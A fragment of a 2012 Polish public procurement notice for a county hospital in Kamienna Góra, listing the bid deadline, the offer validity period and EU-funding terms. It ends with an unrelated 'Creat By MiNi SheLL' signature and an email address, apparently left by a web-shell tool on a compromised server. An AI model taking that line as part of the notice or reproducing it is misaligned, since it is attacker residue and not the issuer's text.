<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2012 godzina 10:00, miejsce: POWIATOWE CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  Sp. z o. o.
Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy 
58-400 Kamienna Góra, ul. Bohaterów Getta 10, woj. dolnośląskie 
SEKREATRIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com